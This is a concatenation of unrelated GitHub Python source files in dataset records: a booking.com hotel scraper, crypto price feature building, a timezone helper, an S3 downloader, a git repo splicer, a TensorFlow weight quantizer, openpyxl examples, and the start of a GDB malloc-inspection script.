headers=self.headers)\n if res.status_code == 200:\n page = res.text\n with open(fname, 'w', encoding='utf-8') as fh:\n fh.write(page)\n else:\n print(\n \"Requests module failed.\"\n \"To fetch booking.com page: %s\" % (url)\n )\n time.sleep(5)\n soup = BeautifulSoup(page, 'html.parser')\n soup.prettify()\n return soup\n\n def fetch_hotel_page(self, soup, country, offset_value):\n \"\"\" Fetch hotel details url.\"\"\"\n hotel_links = soup.find_all('a', {'class': 'hotel_name_link url'})\n if len(hotel_links) == 0:\n hotel_links = soup.find_all(\n 'a',\n {'class': 'js-sr-hotel-link hotel_name_link url'}\n )\n for page_no, link in enumerate(hotel_links):\n html_file = os.path.join(\n os.getcwd(),\n self.output_dir,\n country,\n '%s_page_%s_hotel_%s.html' % (\n country, offset_value, page_no\n )\n )\n print('>> Looking for %s page %s hotel %s' % (\n country, offset_value, page_no+1)\n )\n hotel_url = \"%s%s\" % (\n \"https://www.booking.com\",\n link.get('href').strip()\n )\n soup = self.fetch_page(hotel_url, html_file)\n self.parse_data(soup, country)\n\n def parse_data(self, soup, country):\n \"\"\"Parse data.\"\"\"\n if soup is not None:\n details = {}\n hotel_name = soup.find('h2', {'id': 'hp_hotel_name'}).text.strip()\n name = hotel_name.split('\\n')\n if len(name) > 1:\n name = name[1]\n else:\n name = hotel_name\n name = name.replace(',', '')\n get_latlng = soup.find('a', {'id': 'hotel_sidebar_static_map'})\n if get_latlng is None:\n get_latlng = soup.find('a', {'id': 'hotel_address'})\n latlng = get_latlng.get('data-atlas-latlng')\n # find address\n address = re.search(\n r'\\\"addressLocality\\\"\\s*:\\s*\\\"(.*?)\\\"',\n str(soup)\n ).group(1)\n address = address.replace(',', '')\n # find city\n city = re.search(\n r\"city_name\\s*:\\s*'(.*?)'\",\n str(soup)\n ).group(1)\n city = city.replace(',', '')\n # find postal code\n postal = re.search(\n r'\\\"postalCode\\\"\\s*:\\s*\\\"(.*?)\\\"',\n str(soup)\n ).group(1)\n postal = postal.replace(' ', '')\n # find country\n country_name = re.search(\n r'\\\"addressCountry\\\"\\s*:\\s*\\\"(.*?)\\\"',\n str(soup)\n ).group(1)\n # store data\n (lat, lng) = latlng.split(',')\n details['lat'] = lat\n details['long'] = lng\n details['name'] = name\n details['street'] = address\n details['city'] = city\n details['postal_code'] = postal\n details['country'] = country_name\n self.data.append(details)\n\n def start_process(self):\n \"\"\"Method to fetch the hotels from booking.com.\"\"\"\n self.create_dir(os.path.join(self.output_dir))\n (homepage, countries) = (None, {})\n print('Fetching booking.com homepage...')\n res = self.session.get(self.home_url, headers=self.headers)\n if res.status_code == 200:\n homepage = res.text\n soup = BeautifulSoup(homepage, 'html.parser')\n soup.prettify()\n # - Collect ISO country code.\n get_country_code = soup.find_all('link', {'rel': 'alternate'})\n # - Collect label land sid\n link_help = soup.find('link', {'rel': 'help'})\n help_link = link_help.get('href')\n label = re.search('label=(.*?);', help_link).group(1)\n sid = re.search('sid=(.*?);', help_link).group(1)\n for link in get_country_code:\n language = link.get('hreflang')\n if language:\n if language == 'th':\n countries['Thailand'] = [language, link.get('title')]\n elif language == 'ar':\n countries['UAE'] = [language, link.get('title')]\n elif language == 'sv':\n countries['Sweden'] = [language, link.get('title')]\n elif language == 'en-gb':\n countries['United Kingdom'] = [language, link.get('title')]\n countries['India'] = [language, link.get('title')]\n \n for country in countries.keys():\n self.data = []\n csv_file = os.path.join(\n os.getcwd(),\n '%s_poi.csv' % country.replace(' ', '_')\n )\n if os.path.isfile(csv_file):\n continue\n print('Started searching hotel for country: %s' % country)\n offset_value = 0 # first page offset.\n lang_code = countries.get(country)[0]\n self.create_dir(os.path.join(self.output_dir, country))\n html_file = os.path.join(\n os.getcwd(),\n self.output_dir,\n country,\n '%s_page_%s.html' % (country, offset_value)\n )\n url = self.create_url(country, lang_code, offset_value, label, sid)\n res = self.fetch_page(url, html_file)\n soup = self.fetch_hotel_page(\n res, country, offset_value\n )\n self.parse_data(soup, country)\n if res.find_all(\n 'li', {'class': 'sr_pagination_item'}\n ) is not None:\n offset_max = res.find_all(\n 'li', {'class': 'sr_pagination_item'}\n )[-1].get_text().splitlines()[-1]\n if int(offset_max) > self.max_offset:\n self.max_offset = self.max_offset\n else:\n self.max_offset = int(offset_max)\n for i in range(self.max_offset):\n offset_value += 25 # next page offset\n html_file = os.path.join(\n os.getcwd(),\n self.output_dir,\n country,\n '%s_page_%s.html' % (country, offset_value)\n )\n next_page_url = self.create_url(\n country, lang_code, offset_value, label, sid\n )\n res = self.fetch_page(next_page_url, html_file)\n soup = self.fetch_hotel_page(\n res, country, offset_value\n )\n print('Searching of hotel for country: %s completed.' % (\n country)\n )\n df = pd.DataFrame(self.data)\n df.to_csv(\"%s_poi.csv\" % (\n country.replace(' ', '_')),\n index=False\n )\n\n\n# - main method\nif __name__ == '__main__':\n booking = fetch_booking_dot_com()\n booking.start_process()\n","repo_name":"rahul-gurave127/dev","sub_path":"fetch_booking_dot_com.py","file_name":"fetch_booking_dot_com.py","file_ext":"py","file_size_in_byte":9737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"18514604780","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport sqlite3\nimport tensorflow as tf\nfrom random import randint\nimport math\nimport keras\nfrom keras.layers import Dense, Activation\nfrom keras.models import Sequential\n\n\ndef av_group(tab,n):\n s = tab.size\n new_size = s / n\n ans = np.zeros(new_size)\n for i in range(new_size):\n ans[i] = np.mean(tab[i*n:(i+1)*n])\n return ans\n\nconn = sqlite3.connect('../../vwap.sqlite')\n\ncursor = conn.cursor()\n\n\ncursor.execute(\"SELECT Price,Volume,Time FROM ETHEUR\")\neth = np.array(cursor.fetchall())\neth = eth[:-100000,:]\n\ncursor.execute(\"SELECT Price,Volume,Time FROM XBTEUR\")\nbtc = np.array(cursor.fetchall())\nbtc = btc[:-100000,:]\n\n(size, p) = btc.shape\n# plt.plot(btc[:,2],btc[:,0])\n# plt.show()\nminWindowSize = 5\n\nethPrice= av_group(eth[:,0],minWindowSize)\nbtcPrice= av_group(btc[:,0],minWindowSize)\nsize = ethPrice.size\n\nethLog = np.log(ethPrice[1:]) - np.log(ethPrice[:(size-1)]) \nbtcLog = np.log(btcPrice[1:]) - np.log(btcPrice[:(size-1)]) \nethLog = 1000* ethLog\nbtcLog = 1000* btcLog\n\nwindowSizes=np.array([1,4,20])\nwindowQuantity=np.array([3,3,1])\nnbWindow = windowSizes.size\ninputSize = np.sum(windowQuantity)\nbuf = np.max(windowSizes*windowQuantity)\n\n# Build train set\ndef build_train_set(tab):\n ans = np.zeros([tab.size-buf,inputSize+1])\n for i in range(tab.size - buf):\n nInput = 0\n inputVector = np.zeros(inputSize)\n # Loop over window sizes\n for nW in range(nbWindow):\n # Loop over the number of window of size windowSizes[nW]\n for j in range(windowQuantity[nW]):\n # Final index of the window\n indexEnd = i + buf - j*windowSizes[nW]\n windowMean = np.mean(tab[(indexEnd-windowSizes[nW]):indexEnd])\n inputVector[nInput]=windowMean\n nInput+=1\n outputValue=np.mean(tab[(i + buf) : (i + buf + 3)])\n ans[i,:-1]=inputVector\n ans[i,inputSize]=outputValue\n return ans\n\ndef random_batch(train_set, batch_size):\n (nR, nC) = train_set.shape\n ans = np.zeros([batch_size, nC])\n for i in range(batch_size):\n r= randint(0,nR-1)\n ans[i,:] = train_set[r,:]\n return ans\n\n\neth_train_set = build_train_set(ethLog)\nbtc_train_set = build_train_set(btcLog)\n\ninputSize = 2*inputSize\ntrain_set = np.concatenate((btc_train_set[:,:-1],eth_train_set), axis=1)\n\n","repo_name":"Kraji/lambo","sub_path":"data/build_train_set.py","file_name":"build_train_set.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"1352514978","text":"from datetime import timedelta, tzinfo\r\nimport time as _time\r\n\r\nSTDOFFSET = timedelta(seconds = -_time.timezone)\r\nif _time.daylight:\r\n DSTOFFSET = timedelta(seconds = -_time.altzone)\r\nelse:\r\n DSTOFFSET = STDOFFSET\r\n\r\nDSTDIFF = DSTOFFSET - STDOFFSET\r\nZERO = timedelta(0)\r\n\r\nclass LocalTimezone(tzinfo):\r\n\r\n def utcoffset(self, dt):\r\n if self._isdst(dt):\r\n return DSTOFFSET\r\n else:\r\n return STDOFFSET\r\n\r\n def dst(self, dt):\r\n if self._isdst(dt):\r\n return DSTDIFF\r\n else:\r\n return ZERO\r\n\r\n def tzname(self, dt):\r\n return _time.tzname[self._isdst(dt)]\r\n\r\n def _isdst(self, dt):\r\n tt = (dt.year, dt.month, dt.day,\r\n dt.hour, dt.minute, dt.second,\r\n dt.weekday(), 0, 0)\r\n stamp = _time.mktime(tt)\r\n tt = _time.localtime(stamp)\r\n return tt.tm_isdst > 0\r\n\r\nLocal = LocalTimezone()\r\n\r\ndef tDiff(dt2, dt1):\r\n return (dt2 - dt1) - (Local.dst(dt2) - Local.dst(dt1))\r\n\r\n\r\n","repo_name":"Pavion/tvstreamrecord","sub_path":"timezone.py","file_name":"timezone.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":43,"dataset":"github-code","pt":"71"} +{"seq_id":"4742149010","text":"import boto3\r\nimport os\r\n\r\n# fetch credentials from env variables\r\naws_access_key_id = os.environ.get('AWS_ACCESS_KEY_ID')\r\naws_secret_access_key = os.environ.get('AWS_SECRET_ACCESS_KEY')\r\n\r\n# setup a AWS S3 client/resource\r\ns3 = boto3.resource(\r\n 's3',\r\n aws_access_key_id=aws_access_key_id,\r\n aws_secret_access_key=aws_secret_access_key,\r\n )\r\n\r\n# point the resource at the existing bucket\r\nbucket = s3.Bucket('anyoneai-datasets')\r\n\r\nfiles_download = ['LeaderBoard_Data.zip', 'Leaderboard_Submission_Example.zip',\r\n 'PAKDD-2010 training data.zip', 'PAKDD2010_Leaderboard_Submission_Example.txt',\r\n 'PAKDD2010_Modeling_Data.txt', 'PAKDD2010_Prediction_Data.txt',\r\n 'PAKDD2010_VariablesList.XLS', 'Prediction_Data.zip']\r\n\r\n \r\ndest_directory = 'data'\r\nsource_directory = 'credit-data-2010'\r\n\r\n\r\ndef download_files(list_of_files):\r\n for file in list_of_files:\r\n dest_path = os.path.join(dest_directory, file)\r\n source_path = os.path.join(source_directory, file)\r\n with open(dest_path, 'wb') as data:\r\n bucket.download_fileobj(source_path, data)\r\n \r\ndownload_files(files_download)","repo_name":"maruurrets/Credit_Risk_Analysis","sub_path":"download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"8301801893","text":"#!/usr/bin/env python\n\nimport re\nimport sys\n\nfrom git_fast_filter import Reset, Commit, FastExportFilter, record_id_rename\nfrom git_fast_filter import fast_export_output, fast_import_input\n\nclass InterleaveRepositories:\n def __init__(self, repo1, repo2, output_dir):\n self.repo1 = repo1\n self.repo2 = repo2\n self.output_dir = output_dir\n\n self.commit_map = {}\n self.last_commit = None\n\n def skip_reset(self, reset):\n reset.skip()\n\n def hold_commit(self, commit):\n commit.skip(new_id = commit.id)\n letter = re.match('Commit (.)', commit.message).group(1)\n self.commit_map[letter] = commit\n\n def weave_commit(self, commit):\n letter = re.match('Commit (.)', commit.message).group(1)\n prev_letter = chr(ord(letter)-1)\n\n # Splice in any extra commits needed\n if prev_letter in self.commit_map:\n new_commit = self.commit_map[prev_letter]\n new_commit.from_commit = self.last_commit\n new_commit.dump(self.target.stdin)\n commit.from_commit = new_commit.id\n\n # Dump our commit now\n commit.dump(self.target.stdin)\n\n # Make sure that commits that depended on new_commit.id will now depend\n # on commit.id\n if prev_letter in self.commit_map:\n self.last_commit = commit.id\n record_id_rename(new_commit.id, commit.id)\n\n def run(self):\n self.target = fast_import_input(self.output_dir)\n\n input1 = fast_export_output(self.repo1)\n filter1 = FastExportFilter(reset_callback = lambda r: self.skip_reset(r),\n commit_callback = lambda c: self.hold_commit(c))\n filter1.run(input1.stdout, self.target.stdin)\n\n input2 = fast_export_output(self.repo2)\n filter2 = FastExportFilter(commit_callback = lambda c: self.weave_commit(c))\n filter2.run(input2.stdout, self.target.stdin)\n\n # Wait for git-fast-import to complete (only necessary since we passed\n # file objects to FastExportFilter.run; and even then the worst that\n # happens is git-fast-import completes after this python script does)\n self.target.stdin.close()\n self.target.wait()\n\nsplicer = InterleaveRepositories(sys.argv[1], sys.argv[2], sys.argv[3])\nsplicer.run()\n","repo_name":"maxandersen/jbosstools-gitmigration","sub_path":"git_fast_filter/testcases/splice_repos.py","file_name":"splice_repos.py","file_ext":"py","file_size_in_byte":2155,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"71"} +{"seq_id":"28163685801","text":"from __future__ import print_function\nimport tensorflow as tf\nimport numpy as np\n\nfrom .helpers import is_weight_tensor\nfrom .graph_checker import check_for_grad_ops\nimport mnncompress.common.MNN_compression_pb2 as compress_pb\nimport uuid\nfrom mnncompress.common.log import mnn_logger\nfrom mnncompress.common.helper import get_pipeline_methods\n\n_Weight_Quant_Support_Ops = ['Conv2D', 'DepthwiseConv2dNative', 'MatMul']\n_WQ_Mark_name = \"_ori_weight_MNN_wq_\"\n\ndef strip_wq_ops():\n graph = tf.get_default_graph()\n all_ops = graph.get_operations()\n for op in all_ops:\n if _WQ_Mark_name in op.name:\n ori_op_name = op.name.split(_WQ_Mark_name)[0]\n ori_index = int(op.name.split(_WQ_Mark_name)[1])\n ori_op = graph.get_operation_by_name(ori_op_name)\n ori_op._update_input(ori_index, op.outputs[0])\n\nclass WeightQuantizer(object):\n def __init__(self, graph=None, bits=8, debug_info=False):\n if graph is None:\n self._graph = tf.get_default_graph()\n else:\n self._graph = graph\n self._ops = self._graph.get_operations()\n\n if bits < 2 or bits > 8:\n raise ValueError(\"bits must be in [2, 8]\")\n self._bits = bits\n self._clamp_value = pow(2.0, bits-1) - 1.0\n\n self._all_conv_and_matmul_layers = [l for l in self._ops if l.type in _Weight_Quant_Support_Ops]\n self._debug_info = debug_info\n self._prune_weight_ops = []\n self._mask = {}\n self._all_weight_tensors = []\n self._all_weight_tensor_op_map = {}\n self._fake_quant_weight_ops = []\n self._initialized = False\n self._eps = 1e-9\n self._total_weight_num = 0.0\n self._remain_weight_num = 0.0\n self._init_prune_ratios = {}\n self._find_all_variable_tensors()\n self._insert_wq_ops()\n\n def save_compress_params(self, filename, append=False):\n compress_proto = compress_pb.Pipeline()\n if append:\n f = open(filename, 'rb')\n compress_proto.ParseFromString(f.read())\n\n compress_proto.version = \"0.0.0\"\n if compress_proto.mnn_uuid == '':\n self._guid = str(uuid.uuid4())\n compress_proto.mnn_uuid = self._guid\n else:\n self._guid = compress_proto.mnn_uuid\n\n if not self._reported:\n detail = {\"algorithm\": \"WQ\", \"pipeline\": get_pipeline_methods(compress_proto), \"compression_rate\": self._total_weight_num / self._remain_weight_num, \\\n \"ori_model_size\": self._total_weight_num * 4.0 / 1024.0 / 1024.0, \\\n \"config\": {\"bits\": self._bits, \"init_prune_ratios\": self._init_prune_ratios}}\n self._reported = mnn_logger.on_done(\"tensorflow\", self._guid, detail)\n\n with tf.gfile.Open(filename, mode=\"wb\") as f:\n f.write(compress_proto.SerializeToString())\n\n print(\"compress proto saved to:\", filename)\n\n def _strip_wq_ops(self):\n for ori_weight_tensor, op_index in self._all_weight_tensor_op_map.items():\n op = op_index[0]\n index = op_index[1]\n op._update_input(index, ori_weight_tensor)\n\n def init(self, sess):\n if self._initialized is True:\n raise RuntimeError(\"you should only initialize weight quantizer once\")\n\n for v in self._all_weight_tensors:\n mask = tf.cast(tf.abs(v) > 1e-9, tf.float32)\n prune_ratio = 1.0 - tf.reduce_mean(mask)\n self._mask[v] = sess.run(mask)\n prune_weight_op = tf.assign(v, v * self._mask[v])\n self._prune_weight_ops.append(prune_weight_op)\n\n prune_ratio = 1 - np.mean(sess.run(mask))\n self._init_prune_ratios[v.name] = prune_ratio\n self._remain_weight_num += self._mask[v].size * (1 - prune_ratio) / (32.0 / self._bits)\n print(v, \"initial prune ratio:\", prune_ratio)\n \n self._initialized = True\n\n def update(self, sess):\n if self._initialized is False:\n raise RuntimeError(\"please initialize the quantizer by 'weight_quantizer.init(sess)', before training the model\")\n \n sess.run(self._prune_weight_ops)\n if self._debug_info:\n for v in self._all_weight_tensors:\n weight = sess.run(v)\n prune_ratio = 1 - np.mean(np.abs(weight) > 1e-9)\n print(v, \"prune_ratio:\", prune_ratio, \"bits:\", self._bits, \"clamp_value:\", self._clamp_value)\n\n def _insert_wq_ops(self):\n grad_ops = check_for_grad_ops(self._graph)\n if grad_ops:\n raise ValueError('gradient op found in graph, exiting %s\\nplease invoke with inference graph only. create quantizer before construct model optimizer\\n' % grad_ops)\n\n for v in self._all_weight_tensors:\n op = self._all_weight_tensor_op_map[v][0]\n index = self._all_weight_tensor_op_map[v][1]\n\n reduce_dims = []\n if op.type == \"Conv2D\":\n reduce_dims = [0, 1, 2]\n if op.type == \"DepthwiseConv2dNative\":\n reduce_dims = [0, 1, 3]\n if op.type == \"MatMul\":\n reduce_dims = None\n trans_a = op.get_attr(\"transpose_a\")\n trans_b = op.get_attr(\"transpose_b\")\n if index == 0:\n if not trans_a:\n reduce_dims = [1]\n else:\n reduce_dims = [0]\n if index == 1:\n if not trans_b:\n reduce_dims = [0]\n else:\n reduce_dims = [1]\n reduce_dims = tuple(reduce_dims)\n \n with tf.variable_scope(op.name + \"_weight_quant\", reuse=tf.AUTO_REUSE):\n with self._graph.gradient_override_map({'Round': 'Identity'}):\n scales = tf.reduce_max(tf.abs(v), axis=reduce_dims, keep_dims=True) / self._clamp_value + self._eps\n quant_w = tf.clip_by_value(tf.round(v / scales), -self._clamp_value, self._clamp_value)\n fake_quant_w = quant_w * scales\n\n op._update_input(index, fake_quant_w)\n\n id = tf.identity(v, name=op.name+_WQ_Mark_name+str(index))\n\n def _find_all_variable_tensors(self):\n for op in self._all_conv_and_matmul_layers:\n if op.type in _Weight_Quant_Support_Ops:\n if op.type in ['Conv2D', 'DepthwiseConv2dNative']:\n weight_tensor = op.inputs[1].op.inputs[0]\n self._total_weight_num += weight_tensor.shape.num_elements()\n self._all_weight_tensors.append(weight_tensor)\n self._all_weight_tensor_op_map[weight_tensor] = [op, 1]\n if self._debug_info:\n print(\"found weight tensor:\", weight_tensor)\n\n if op.type == 'MatMul':\n for i in range(len(op.inputs)):\n input_tensor = op.inputs[i]\n if is_weight_tensor(input_tensor):\n weight_tensor = input_tensor.op.inputs[0]\n self._total_weight_num += weight_tensor.shape.num_elements()\n self._all_weight_tensors.append(weight_tensor)\n self._all_weight_tensor_op_map[weight_tensor] = [op, i]\n if self._debug_info:\n print(\"found weight tensor:\", weight_tensor)\n","repo_name":"alibaba/MNN","sub_path":"tools/mnncompress/mnncompress/tensorflow/weight_quantizer.py","file_name":"weight_quantizer.py","file_ext":"py","file_size_in_byte":7519,"program_lang":"python","lang":"en","doc_type":"code","stars":8012,"dataset":"github-code","pt":"71"} +{"seq_id":"70782116390","text":"import openpyxl\n\n# # Createing and saving excel documents.\n# wb = openpyxl.Workbook() # Create a blank workbook\n# wb.sheetnames # It starts with one sheet.\n# sheet = wb.active\n# print(sheet.title)\n# sheet.title = 'Spam Bacon Eggs Sheet' # Change title.\n# print(sheet.title)\n# print(wb.sheetnames)\n# wb.save('new_file.xlsx') # Save the workbook\n\n# wb = openpyxl.load_workbook('example.xlsx')\n# sheet = wb.active\n# sheet.title = 'Spam Spam Spam'\n# wb.save('example_copy.xlsx') # Save the workbook\n# print(wb.sheetnames)\n\n# # Creating and removing sheets.\n# wb = openpyxl.Workbook()\n# wb.create_sheet() # Add a new sheet.\n\n# # Create a new sheet at index 0.\n# wb.create_sheet(index=0, title=\"First Sheet\")\n# wb.create_sheet(index=2, title=\"Middle Sheet\")\n# print(wb.sheetnames)\n# # Delete sheet from workbook.\n# del wb['Middle Sheet']\n# del wb['Sheet1']\n# print(wb.sheetnames)\n\n# Writing values to cells.\nwb = openpyxl.Workbook()\nsheet = wb['Sheet']\nsheet['A1'] = 'Hello, World!' # Edit the cell's value.\nprint(sheet['A1'].value)\nwb.save('hello_world.xlsx')\n","repo_name":"Alxndr3/atbswp","sub_path":"create_excel_file.py","file_name":"create_excel_file.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"38117164619","text":"\"\"\"Detect HAPS and Non-HAPS events in manometry experiments and plot them as clustered events.\"\"\"\n\nimport scipy.io as sio\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport random\n\n\n__author__ = \"Shameer Sathar, https://github.com/ssat335\"\n__version__ = \"0.0.1\"\n\nfrom HapsNonHapsDetector import HapsNonHapsDetector\nfrom ClusterEvents import ClusterEvents\n\n# load the dataset as rows (channles) and columns(time_steps)\nfilt_data = sio.loadmat('../HR_manometry_filtData/KH_filtData.mat')\n# load a subset if required\ndata_in = filt_data['filtData']\n\n#detect the Haps and Non-Haps as labels 2 and 1 respectively in a matrix of\n#same dimension as input dataset\ndetector = HapsNonHapsDetector(data_in)\ndata_label = detector.obtainHapsNonHapsLabel()\n\n# Plot the detected events. Note: it does contain false orphaned marks. Should be called\n# after obtainHapsNonHapsLabel() method\ndetector.showHapsNonHaps()\n\n# Here, the events are clustered and orphaned marks are removed. If the cluster\n# has less than 3 events, delete those as events\ncluster_mat = ClusterEvents(data_label).getClusteredEventsAsMatrix()\n\n# Plot the clustered events with each label marked as a random colour\n\ndef get_cmap(n, name='hsv'):\n '''Returns a function that maps each index in 0, 1, ..., n-1 to a distinct\n RGB color; the keyword argument name must be a standard mpl colormap name.'''\n return plt.cm.get_cmap(name, n)\n\n# divide the colour map into 100 segments and assign colour randomly to labels\ncmap = get_cmap(100)\nmap_colour = {}\nfor val in np.nditer(np.unique(cluster_mat)):\n map_colour[int(val)] = cmap(random.randint(0, 100))\n\n# plot the figure with the labels as different colour\nplt.figure()\nhorizontal_spacing = 100\nfor channel in range(0,data_in.shape[0]):\n plt.plot(data_in[channel, :] + horizontal_spacing * channel, c='gray' )\n for c in np.nditer(np.unique(cluster_mat)):\n if int(c) is 0:\n pass\n else:\n indexes = np.where(cluster_mat[channel, :] == int(c))\n cmap_val = np.random.rand(3,)\n plt.plot(indexes, data_in[channel, indexes] + horizontal_spacing * channel, 'o', mfc=None, markersize=5, c=map_colour[int(c)])\nplt.show()\n","repo_name":"ssat335/event_analyser","sub_path":"src/runManometryAnalysis.py","file_name":"runManometryAnalysis.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"18828659496","text":"#######################################################################\n# -- meminfo.gdb.py\n# Written by Tom Hebel, 2020\n#######################################################################\n\n# TODO:\n# - Implement an algorithm for finding mmapped chunks ()\n# - Implement verbosity flag in cmd line args.\n# - Align to Python style guide PEP8.\n\n# NOTE:\n# - Always re-initialize class members in the constructur, e.g.:\n#\n# class SomeClass:\n# someMember = []\n# def __init__ (self):\n# someMember = []\n#\n# Reason: https://stackoverflow.com/questions/25401619/python-is-reusing-variables-from-one-instance-of-an-object-for-a-new-one\n#\n# - Use class member access \"modifiers\":\n# member1 <- public\n# _member2 <- protected\n# __member3 <- private\n#\n# See: https://www.tutorialsteacher.com/python/private-and-protected-access-modifiers-in-python\n#\n# REFERENCES:\n# - malloc source: https://code.woboq.org/userspace/glibc/malloc/malloc.c.html#1772\n# - malloc internals:\n# https://sourceware.org/glibc/wiki/MallocInternals\n# http://core-analyzer.sourceforge.net/index_files/Page335.html\n#\n# - Cool GDB Python stuff: https://mcgdb.0x972.info/doc/_modules/mcgdb/toolbox/my_gdb.html\n\nimport gdb\n\n# ------------------------------------------------\n# CONSTANTS\n# ------------------------------------------------\n\n# See: https://code.woboq.org/userspace/glibc/sysdeps/x86/bits/wordsize.h.html\nMALLOC_WORD_SIZE = 64\n\n# See: https://code.woboq.org/userspace/glibc/malloc/malloc.c.html#853\nMALLOC_SIZE_OF_LONG = 8\nMALLOC_DEFAULT_MMAP_THRESHOLD_MAX = 4 * 1024 * 1024 * MALLOC_SIZE_OF_LONG\n\n# Used for calculating the max size of a heap. We are assuming x64 for this.\n# See:\n# - usage of top() and heap_for_ptr() macros:\n# https://code.woboq.org/userspace/glibc/malloc/malloc.c.html#5486\n# - top() macro: https://code.woboq.org/userspace/glibc/malloc/arena.c.html#47\n# - heap_for_ptr() macro: https://code.woboq.org/userspace/glibc/malloc/arena.c.html#127\nMALLOC_HEAP_MAXSIZE = 2 * MALLOC_DEFAULT_MMAP_THRESHOLD_MAX\n\n# Size in bytes for a stack frame's red zone.\n# See: https://eli.thegreenplace.net/2011/09/06/stack-frame-layout-on-x86-64\nSTACK_FRAME_REDZONE_SIZE = 128\n\n# The minimum threshold for (rsp - rbp) before the stack frame is considered\n# to be small enough to likely \"spill\" its local variables into the 128 bytes\n# past rsp.\n# See: ibid.\nSTACK_FRAME_MINSIZE = 8 + 4\n\n# The threshold in bytes for abs(rsp - rbp) before we consider the frame pointer\n# to have been omitted during compilation. We will then use the rsp of the\n# previous stack frame as our rbp. Note: this value is arbitrary and chosen\n# based on my gut feeling rather than anything concrete.\n# See: ibid.\nSTACK_FRAME_MAXSIZE = 512\n\n# ------------------------------------------------\n# UTILS\n# ------------------------------------------------\n# NOTE: Make sure all member functions are static!\n\n# Usage notes:\n# - All pointers must be passed as ints.\n# - All pointers are returned as ints and must be parse_and_eval'd or \"cast\"\n# to hex() as needed. This is to keep things generic and avoid the performance\n# hit of loading malloc structs into Gdb.\nclass MallocMacros:\n \n # See: https://code.woboq.org/userspace/glibc/malloc/arena.c.html#47\n @staticmethod\n def top (ar_ptr):\n return int(gdb.parse_and_eval(\"(unsigned long)((struct malloc_state*){})->top\" \\\n .format(ar_ptr)))\n\n # See: https://code.woboq.org/userspace/glibc/malloc/arena.c.html#125\n @staticmethod\n def heap_for_ptr (ptr):\n return int(gdb.parse_and_eval(\"(unsigned long)((unsigned long){} & ~({} - 1))\" \\\n .format(ptr, MALLOC_HEAP_MAXSIZE)))\n\n# ------------------------------------------------\n\nclass MemInfoUtils:\n\n @staticmethod\n def findContainerForAddress (containerList): # Type: MemoryContainer\n pass\n\n# ------------------------------------------------\n# MALLOC INFO\n# ------------------------------------------------\n\n# type = struct malloc_par {\n# unsigned long trim_threshold;\n# size_t top_pad;\n# size_t mmap_threshold;\n# size_t arena_test;\n# size_t arena_max;\n# int n_mmaps;\n# int n_mmaps_max;\n# int max_n_mmaps;\n# int no_dyn_threshold;\n# size_t mmapped_mem;\n# size_t max_mmapped_mem;\n# size_t max_total_mem;\n# char *sbrk_base;\n# }\nclass MallocInfo:\n\n malloc_parPtr = None # Type: gdb.Type (struct malloc_par)\n sbrkBase = 0\n arenas = [] # Type: List[MallocArenaInfo]\n loAddr = 0\n hiAddr = 0\n\n __memoryContainers = None # Type: List[MemoryContainer]\n\n def __init__ (self, memoryContainers):\n self.malloc_parPtr = gdb.parse_and_eval(\"mp_\")\n self.sbrkBase = int(gdb.parse_and_eval(\"(unsigned long)mp_->sbrk_base\"))\n self.arenas = []\n self.loAddr = self.sbrkBase\n self.__memoryContainers = memoryContainers\n\n def loadArenas (self, loadHeaps=True):\n mainArenaAddr = int(gdb.parse_and_eval(\"(unsigned long)&main_arena\"))\n currArenaAddr = mainArenaAddr\n isMain = True\n while True:\n # DEBUG\n if len(self.arenas) == 2: break\n # /DEBUG\n print(\"\\t[{}] Arena (struct malloc_state*){}\".format(len(self.arenas)+1, hex(currArenaAddr)))\n currArena = MallocArenaInfo(self.__memoryContainers, currArenaAddr, isMain)\n if loadHeaps:\n currArena.loadHeaps()\n self.arenas.append(currArena)\n if currArena.hiAddr > self.hiAddr:\n self.hiAddr = currArena.hiAddr\n currArenaAddr = int(gdb.parse_and_eval((\"(unsigned long)((struct malloc_state*){})->next\") \\\n .format(currArenaAddr)))\n isMain = False\n if currArenaAddr == mainArenaAddr:\n break\n\n print(\"\\t[Done]\\n\")\n\n self.__memoryContainers.append(MemoryContainer(self.loAddr, self.hiAddr, self, \"All_Heaps\"))\n\n# ------------------------------------------------\n\n# type = struct malloc_state {\n# mutex_t mutex;\n# int flags;\n# mfastbinptr fastbinsY[10];\n# mchunkptr top;\n# mchunkptr last_remainder;\n# mchunkptr bins[254];\n# unsigned int binmap[4];\n# struct malloc_state *next;\n# struct malloc_state *next_free;\n# size_t system_mem;\n# size_t max_system_mem;\n# }\nclass MallocArenaInfo:\n \n malloc_stateAddr = 0 # Type: int (struct malloc_state*)\n isMain = 0\n topChunkAddr = 0\n currSize = 0\n maxSize = 0\n loAddr = 0 # Where the arena starts\n hiAddr = 0 # Where the arena ends\n heaps = [] # Type: List[MallocHeapInfo]\n\n __memoryContainers = None # Type: List[MemoryContainer]\n\n def __init__ (self, memoryContainers, malloc_stateAddr, isMain=False):\n self.malloc_stateAddr = int(malloc_stateAddr)\n self.isMain = isMain\n self.topChunkAddr = int(gdb.parse_and_eval(\"(unsigned long)((struct malloc_state*){})->top\" \\\n .format(hex(malloc_stateAddr))))\n\n # See:\n # - https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/implementation/malloc/\n # - https://code.woboq.org/userspace/glibc/malloc/malloc.c.html#malloc_state\n self.currSize = int(gdb.parse_and_eval(\"((struct malloc_state*){})->system_mem\" \\\n .format(hex(malloc_stateAddr))))\n self.maxSize = int(gdb.parse_and_eval(\"((struct malloc_state*){})->max_system_mem\" \\\n .format(hex(malloc_stateAddr))))\n \n self.loAddr = 0\n self.hiAddr = 